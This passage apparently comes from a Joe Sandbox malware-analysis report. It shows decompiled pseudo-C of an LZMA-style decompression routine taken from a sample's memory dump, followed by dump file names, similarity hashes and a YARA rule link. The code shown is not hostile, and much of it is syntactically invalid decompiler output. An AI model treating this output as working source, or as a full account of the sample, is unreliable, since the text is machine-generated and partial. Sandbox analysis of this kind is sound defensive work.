											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												L49:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													L53:
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L161:
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											L59:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												L65:
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L165:
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											L110:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											goto L132;
										case 0x12:
											L128:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L131:
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												L132:
												 *(_t644 - 0x54) = _t642;
												goto L133;
											}
											L129:
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											L141:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L143:
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
											L142:
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											L156:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											while(1) {
												L140:
												 *(_t644 - 0x88) = _t537;
												goto L1;
											}
										case 0x15:
											L91:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											goto L0;
										case 0x17:
											while(1) {
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
										case 0x18:
											goto L146;
										case 0x19:
											L94:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												L98:
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													L166:
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												L121:
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												L122:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											L95:
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												L97:
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													L107:
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														L118:
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													L113:
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														L117:
														goto L109;
													}
												}
												L103:
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													L106:
													goto L99;
												}
											}
											L96:
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L162:
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											L57:
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L163:
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											L77:
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												L124:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L127:
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											L167:
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t539 = _t538 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}

Memory Dump Source

Source File: 00000005.00000002.719266122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.719245816.0000000000400000.00000002.00020000.sdmpDownload File
Associated: 00000005.00000002.719274597.0000000000407000.00000002.00020000.sdmpDownload File
Associated: 00000005.00000002.719289522.0000000000409000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719317497.0000000000422000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719325242.0000000000429000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719366138.000000000042C000.00000002.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_rstmgknbahw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4704a5ed105780f6478b7403eb4dd8ec19d01cc9a077ced7c1a67cf9ab5ccc14
Instruction ID: 5ae99ca79f71cc2638d3baaeb57d6c4ee888c8cbc78e3ce5cc4ffc2d3191f51a
Opcode Fuzzy Hash: 4704a5ed105780f6478b7403eb4dd8ec19d01cc9a077ced7c1a67cf9ab5ccc14
Instruction Fuzzy Hash: 1FA13571D00229CBDF28CFA8C854BADBBB1FF44305F15816AD816BB281D7785A86DF44

Uniqueness

Uniqueness Score: -1.00%

Function 00406682 Relevance: 5.2, APIs: 4, Instructions: 208
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406682() {
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int* _t605;
				void* _t612;

				L0:
				while(1) {
					L0:
					if( *(_t612 - 0x40) != 0) {
						 *(_t612 - 0x84) = 0x13;
						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x4c);
						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
						__ecx =  *(__ebp - 0x58);
						__eax =  *(__ebp - 0x4c) << 4;
						__eax =  *(__ebp - 0x58) + __eax + 4;
						L130:
						 *(__ebp - 0x58) = __eax;
						 *(__ebp - 0x40) = 3;
						L144:
						 *(__ebp - 0x7c) = 0x14;
						L145:
						__eax =  *(__ebp - 0x40);
						 *(__ebp - 0x50) = 1;
						 *(__ebp - 0x48) =  *(__ebp - 0x40);
						L149:
						if( *(__ebp - 0x48) <= 0) {
							__ecx =  *(__ebp - 0x40);
							__ebx =  *(__ebp - 0x50);
							0 = 1;
							__eax = 1 << __cl;
							__ebx =  *(__ebp - 0x50) - (1 << __cl);
							__eax =  *(__ebp - 0x7c);
							 *(__ebp - 0x44) = __ebx;
							while(1) {
								L140:
								 *(_t612 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t612 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M004068EF))) {
										case 0:
											if( *(_t612 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t534 =  *( *(_t612 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t569);
											_push(9);
											_pop(_t570);
											_t608 = _t538 / _t569;
											_t540 = _t538 % _t569 & 0x000000ff;
											asm("cdq");
											_t603 = _t540 % _t570 & 0x000000ff;
											 *(_t612 - 0x3c) = _t603;
											 *(_t612 - 0x1c) = (1 << _t608) - 1;
											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
											_t611 = (0x300 << _t603 + _t608) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
												L10:
												if(_t611 == 0) {
													L12:
													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t611 = _t611 - 1;
													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
												} while (_t611 != 0);
												goto L12;
											}
											if( *(_t612 - 4) != 0) {
												GlobalFree( *(_t612 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t612 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 1;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t45 = _t612 - 0x48;
											 *_t45 =  *(_t612 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t612 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t612 - 0x40);
											if(_t546 ==  *(_t612 - 0x74)) {
												L20:
												 *(_t612 - 0x48) = 5;
												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t612 - 0x74) = _t546;
											if( *(_t612 - 8) != 0) {
												GlobalFree( *(_t612 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
											 *(_t612 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
											 *(_t612 - 0x84) = 6;
											 *(_t612 - 0x4c) = _t553;
											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 3;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											_t67 = _t612 - 0x70;
											 *_t67 =  &(( *(_t612 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L23:
											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
											if( *(_t612 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t605;
											_t588 = _t531 & 0x0000ffff;
											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
											if( *(_t612 - 0xc) >= _t564) {
												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
												 *(_t612 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												__eflags = _t532;
												 *_t605 = _t532;
											} else {
												 *(_t612 - 0x10) = _t564;
												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
												 *_t605 = (0x800 - _t588 >> 5) + _t531;
											}
											if( *(_t612 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 5;
												goto L170;
											}
											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L139:
											_t533 =  *(_t612 - 0x84);
											goto L140;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
